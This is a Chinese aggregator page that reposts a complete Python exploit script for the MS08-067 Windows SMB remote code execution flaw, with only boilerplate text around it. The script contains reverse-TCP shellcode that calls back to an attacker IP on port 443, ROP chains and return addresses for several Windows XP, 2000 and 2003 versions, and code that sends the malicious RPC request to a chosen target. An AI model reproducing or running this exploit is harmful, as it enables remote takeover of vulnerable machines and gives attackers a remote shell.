python 在此处找到MS08-067 python脚本的修改版本:https://github.com/ankh2054/python-exploits/blob/master/ms08_067.
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python 在此处找到MS08-067 python脚本的修改版本:https://github.com/ankh2054/python-exploits/blob/master/ms08_067.相关的知识,希望对你有一定的参考价值。
#!/usr/bin/env python
import struct
import time
import sys
from threading import Thread # Thread is imported incase you would like to modify
try:
from impacket import uuid
from impacket.dcerpc.v5 import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit #'
print '# This is a modified verion of Debasis Mohanty\'s code #'
print '# (https://www.exploit-db.com/exploits/7132/). #'
print '# The return addresses and the ROP parts are ported from metasploit #'
print '# module exploit/windows/smb/ms08_067_netapi #'
print '#######################################################################\n'
# Shellcode - Standard Reverse TCP shellcode
# Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
# Payload size: 348 bytes + 62 NOPs (included)
# Make sure you set meterpreter EXITFUNC=thread - Important!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 \
# EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -n 62
shellcode = (
"\x49\x3f\xfd\xfc\xfc\x43\xfc\x90\xd6\xfc\x42\x43\x41\x3f\x43\x4a"
"\xfd\xd6\x48\x92\x99\x42\x27\x41\xf8\xfc\x90\xf8\xf5\x91\x9f\xf9"
"\x98\x37\x93\x41\x3f\xf5\x93\x98\xd6\x4b\x48\x3f\x27\x4a\x43\xf5"
"\xfd\x43\xf9\x90\xf9\x98\x90\x4a\x92\x4a\x9f\xfc\x98\x92\x33\xc9"
"\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x9c\x91\x96"
"\xc3\x83\xee\xfc\xe2\xf4\x60\x79\x14\xc3\x9c\x91\xf6\x4a\x79\xa0"
"\x56\xa7\x17\xc1\xa6\x48\xce\x9d\x1d\x91\x88\x1a\xe4\xeb\x93\x26"
"\xdc\xe5\xad\x6e\x3a\xff\xfd\xed\x94\xef\xbc\x50\x59\xce\x9d\x56"
"\x74\x31\xce\xc6\x1d\x91\x8c\x1a\xdc\xff\x17\xdd\x87\xbb\x7f\xd9"
"\x97\x12\xcd\x1a\xcf\xe3\x9d\x42\x1d\x8a\x84\x72\xac\x8a\x17\xa5"
"\x1d\xc2\x4a\xa0\x69\x6f\x5d\x5e\x9b\xc2\x5b\xa9\x76\xb6\x6a\x92"
"\xeb\x3b\xa7\xec\xb2\xb6\x78\xc9\x1d\x9b\xb8\x90\x45\xa5\x17\x9d"
"\xdd\x48\xc4\x8d\x97\x10\x17\x95\x1d\xc2\x4c\x18\xd2\xe7\xb8\xca"
"\xcd\xa2\xc5\xcb\xc7\x3c\x7c\xce\xc9\x99\x17\x83\x7d\x4e\xc1\xf9"
"\xa5\xf1\x9c\x91\xfe\xb4\xef\xa3\xc9\x97\xf4\xdd\xe1\xe5\x9b\x6e"
"\x43\x7b\x0c\x90\x96\xc3\xb5\x55\xc2\x93\xf4\xb8\x16\xa8\x9c\x6e"
"\x43\x93\xcc\xc1\xc6\x83\xcc\xd1\xc6\xab\x76\x9e\x49\x23\x63\x44"
"\x01\xa9\x99\xf9\x9c\xc8\x9c\xce\xfe\xc1\x9c\x90\x2d\x4a\x7a\xfb"
"\x86\x95\xcb\xf9\x0f\x66\xe8\xf0\x69\x16\x19\x51\xe2\xcf\x63\xdf"
"\x9e\xb6\x70\xf9\x66\x76\x3e\xc7\x69\x16\xf4\xf2\xfb\xa7\x9c\x18"
"\x75\x94\xcb\xc6\xa7\x35\xf6\x83\xcf\x95\x7e\x6c\xf0\x04\xd8\xb5"
"\xaa\xc2\x9d\x1c\xd2\xe7\x8c\x57\x96\x87\xc8\xc1\xc0\x95\xca\xd7"
"\xc0\x8d\xca\xc7\xc5\x95\xf4\xe8\x5a\xfc\x1a\x6e\x43\x4a\x7c\xdf"
"\xc0\x85\x63\xa1\xfe\xcb\x1b\x8c\xf6\x3c\x49\x2a\x76\xde\xb6\x9b"
"\xfe\x65\x09\x2c\x0b\x3c\x49\xad\x90\xbf\x96\x11\x6d\x23\xe9\x94"
"\x2d\x84\x8f\xe3\xf9\xa9\x9c\xc2\x69\x16"
)
nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
"A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"
module_base = 0x6f880000
def generate_rop(rvas):
gadget1 = "\x90\x5a\x59\xc3"
gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
gadget3 = "\xcc\x90\xeb\x5a"
ret = struct.pack('<L', 0x00018000)
ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base)
ret += struct.pack('<L', 0x01040110)
ret += struct.pack('<L', 0x01010101)
ret += struct.pack('<L', 0x01010101)
ret += struct.pack('<L',
rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base)
ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
ret += gadget1
ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base)
ret += struct.pack('<L', rvas['jmp eax'] + module_base)
ret += gadget2[0]
ret += gadget2[1]
ret += struct.pack('<L', rvas[
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
ret += gadget2[2]
ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base)
ret += struct.pack('<L', rvas['jmp eax'] + module_base)
ret += gadget3
return ret
class SRVSVC_Exploit(Thread):
def __init__(self, target, os, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__trans = None
self.__dce = None
self.__stub = None
self.__port = port
self.__target = target
self.__os = os
def __DCEPacket(self):
if self.__os == '1':
print 'Windows XP SP0/SP1 Universal\n'
ret = "\x61\x13\x00\x01"
jumper = nonxjmper % (ret, ret)
elif self.__os == '2':
print 'Windows 2000 Universal\n'
ret = "\xb0\x1c\x1f\x00"
jumper = nonxjmper % (ret, ret)
elif self.__os == '3':
print 'Windows 2003 SP0 Universal\n'
ret = "\x9e\x12\x00\x01" # 0x01 00 12 9e
jumper = nonxjmper % (ret, ret)
elif self.__os == '4':
print 'Windows 2003 SP1 English\n'
ret_dec = "\x8c\x56\x90\x7c" # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
ret_pop = "\xf4\x7c\xa2\x7c" # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
jmp_esp = "\xd3\xfe\x86\x7c" # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
disable_nx = "\x13\xe4\x83\x7c" # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
jumper = disableNXjumper % (
ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
elif self.__os == '5':
print 'Windows XP SP3 French (NX)\n'
ret = "\x07\xf8\x5b\x59" # 0x59 5b f8 07
disable_nx = "\xc2\x17\x5c\x59" # 0x59 5c 17 c2
# the nonxjmper also work in this case.
jumper = nonxjmper % (disable_nx, ret)
elif self.__os == '6':
print 'Windows XP SP3 English (NX)\n'
ret = "\x07\xf8\x88\x6f" # 0x6f 88 f8 07
disable_nx = "\xc2\x17\x89\x6f" # 0x6f 89 17 c2
# the nonxjmper also work in this case.
jumper = nonxjmper % (disable_nx, ret)
elif self.__os == '7':
print 'Windows XP SP3 English (AlwaysOn NX)\n'
rvasets = {'call_HeapCreate': 0x21286,
'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796,
'pop ecx / ret': 0x2e796 + 6,
'mov [eax], ecx / ret': 0xd296,
'jmp eax': 0x19c6f,
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56,
'mov [eax+0x10], ecx / ret': 0x10a56 + 6,
'add eax, 8 / ret': 0x29c64}
# the nonxjmper also work in this case.
jumper = generate_rop(rvasets) + "AB"
else:
print 'Not supported OS version\n'
sys.exit(-1)
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory(
'ncacn_np:%s[\\pipe\\browser]' % self.__target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.__target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(
('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Change shellcode to your required shellcode
path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + \
"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
"\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" + \
"\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
self.__stub = server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + \
path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
time.sleep(5)
print 'Exploit finish\n'
def main():
try:
target = sys.argv[1]
os = sys.argv[2]
except IndexError:
print 'Usage: %s <target ip>\n' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 1\' for Windows XP SP0/SP1 Universal' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 2\' for Windows 2000 Universal' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 3\' for Windows 2003 SP0 Universal' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 4\' for Windows 2003 SP1 English' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 5\' for Windows XP SP3 French (NX)' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 6\' for Windows XP SP3 English (NX)' % sys.argv[0]
print 'Example: \'%s 192.168.1.1 7\' for Windows XP SP3 English (AlwaysOn NX)' % sys.argv[0]
sys.exit(-1)
current = SRVSVC_Exploit(target, os)
current.start()
if __name__ == '__main__':
main()
以上是关于python 在此处找到MS08-067 python脚本的修改版本:https://github.com/ankh2054/python-exploits/blob/master/ms08_067.的主要内容,如果未能解决你的问题,请参考以下文章
Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御
MS-08-067 windows smb服务 远程命令执行漏洞
Windows XP SP2(MS08-067漏洞复现及利用)